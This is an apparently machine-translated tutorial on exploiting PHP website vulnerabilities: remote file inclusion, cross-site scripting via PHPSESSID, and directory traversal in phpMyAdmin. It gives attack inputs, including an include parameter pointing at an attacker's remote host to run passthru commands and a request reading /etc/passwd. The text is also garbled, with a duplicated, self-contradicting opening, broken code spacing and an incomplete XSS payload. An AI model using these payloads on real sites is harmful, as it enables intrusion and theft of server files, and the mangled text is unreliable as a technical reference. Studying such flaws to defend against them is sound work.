Summary of PHP script website vulnerabilities

Summary of vulnerabilities in the PHP script website from the current network security perspective, the most common WEB page vulnerabilities are ASP. in this regard, John is an expert and I have no right to speak. however, in terms of PHP, from the perspective of network security, ASP is the most common WEB page vulnerability. in this regard, John is an expert and I have no right to speak. however, there are also serious security problems in PHP, but there are not many articles in this regard. here, I 'd like to discuss with you a little bit about the vulnerabilities on the PHP page.

I have summarized common PHP vulnerabilities, including file vulnerabilities, script command execution vulnerabilities, file leaks, and SQL injection vulnerabilities. of course, some common technologies such as COOKIE spoofing will not be discussed here, and there are many such information on the Internet. let's analyze how to exploit these vulnerabilities one by one!

First, we will discuss the file inclusion vulnerability. this vulnerability should be unique to PHP. this is due to insufficient processing of external malicious data, which allows remote attackers to exploit these vulnerabilities to execute arbitrary commands on the system with WEB process permissions. let's look at an example: suppose in. php has the following code:
Include ($ include. "/xxx. php ");
?>
In this code, $ include is generally a set path, but we can construct a path to achieve the attack purpose. for example, we submit a. php? Include = http: // web/B. php, this web is the space we use for attacks, of course, B. php is the code we use to attack. we can. php writes code similar to passthru ("/bin/ls/etc. in this way, you can execute some targeted attacks. (Note: The web server should not be able to execute php code, or else there will be a problem. for more information, see < <如何对php程序中的常见漏洞进行攻击> >). There are many issues with this vulnerability, for example, PayPal Store Front,
HotNews, Mambo Open Source, PhpDig, yabb se, phpBB, InvisionBoard, solmetra spaw Editor, Les Visiteurs, PhpGedView, X-Cart, and so on.

Next, let's take a look at the script command execution vulnerability. this is because the URI parameters submitted by the user are not fully filtered. submitting data containing malicious HTML code can trigger cross-site scripting attacks and obtain sensitive information of the target user. We also give an example: the index. PHP page in PHP 4.3.1 or earlier versions of PHP Transparent does not fully filter PHPSESSID. we can use this code to attack:
Http: // web/index. php? PHPSESSID = "> in the script, we can construct functions to obtain some sensitive information of users. in terms of this vulnerability, PHP Transparent, PHP-Nuke, phpBB, PHP Classifieds, PHPix, Ultimate PHP Board, and so on.

Next, let's look at the file leakage vulnerability. this vulnerability is due to the lack of adequate filtering for user submitted parameters. remote attackers can exploit it to perform directory traversal attacks and obtain some sensitive information. Let's take phpMyAdmin as an example. in phpMyAdmin, export. the php page does not fully Filter user-submitted 'wh' parameters. remote attacker submissions contain multiple '.. /'character data, attackers can bypass the web root restriction and view any file information on the system with WEB permissions. For example, enter an address: export. php? What =.../etc/passwd